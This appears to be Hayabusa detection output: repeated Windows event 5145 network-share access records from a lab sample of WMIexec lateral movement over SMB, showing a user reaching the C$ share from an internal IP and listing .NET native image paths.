0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.620 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B22c61a69#\a8aada24560f515d50d1227a4edb9a68 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.620 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B46c55d17# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.620 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B46c55d17#\a3f0de129553f858134a0e204ddf44c3 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.642 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B83e9cb53# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.642 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network 
Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B83e9cb53#\b2eb2f250605eb6b697ed75a050e9fa1 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.652 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B3325a29b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.652 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B3325a29b#\2d63d4f586d1192cb1d550c159a42729 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.652 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Baa2ca56b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 
+2021-04-22 11:32:29.652 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Baa2ca56b#\71d44db8d855f43bafe707aabf0050d7 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.652 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Bfc9dc24d# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.652 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Bfc9dc24d#\d33525eb35c4aa8b45b1e60e144e50ab | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.683 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Build | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.683 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Build\d6c8ca8dfe9cd143210459e72a546bf8 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.683 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.C8d726d22# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.683 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.C8d726d22#\95eb335a0d6884a4b311ce7041f71bc3 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.699 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.C25dcfcb8# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.699 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.C25dcfcb8#\81fd3145ed18f31e338ec4dcb5afd7f7 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.699 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.C26a36d2b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.699 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.C26a36d2b#\2dab9f12dfcdb3bd487693c1bb12e0a6 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.714 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network 
Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ca018eff0# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.714 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ca018eff0#\4d5abc40df9ad72124f147d1d55dd690 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.714 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.CSharp | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.730 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.CSharp\004d51a9ac1d91d6537ad572591ebbd3 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 
+2021-04-22 11:32:29.730 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.D0ff51f83# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.730 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.D0ff51f83#\b7a83293c2e4f23480fc3660b70099e6 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.730 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.G46fcc235# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.730 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.G46fcc235#\f8fa567f21f9aef0ae471c625b59c159 | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.730 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.G91a07420# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.730 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.G91a07420#\5d1b6f60febb9cec91a92675a96ee63d | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.746 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ga41585c2# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.746 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ga41585c2#\b101a91893057573f159893cb9c2f28d | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.746 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.I0cd65b90# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.746 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.I0cd65b90#\e037edd0e9a4a487424cd2d4e3527c92 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.764 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.I7676db1a# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.764 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network 
Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.I7676db1a#\aaf7a4161dcd6792ce570a810a0c53f6 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.764 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ib6702479# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.764 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ib6702479#\662c453241af44299325f4c07d7f718c | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.764 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ic1a2041b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 
+2021-04-22 11:32:29.764 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ic1a2041b#\154acb6c70e2dddd2c94bf0bc748b8b7 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.780 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ifcaec084# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.780 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ifcaec084#\9d9142f584dbdd4e6d4bd7fd6f877b66 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.780 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Kd58820a5# | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.780 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Kd58820a5#\ba928c3b8a0cdac392162a6b572de29f | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.780 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.M870d558a# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.780 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.M870d558a#\1b67145a56e345e0d2e731357f498c1d | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.780 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Meefd589e# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.780 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Meefd589e#\e857b644c45626101624d874e1860701 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.780 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mf5ac9168# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.780 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mf5ac9168#\1b9aff98baffeed692a8e8768c0c4e47 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.796 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network 
Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mf49f6405# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.796 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mf49f6405#\2f732bd1dcfeef1bb935c1d1444abdef | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.796 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mff1be75b# | IP Addr: 10.23.23.9 | LID: 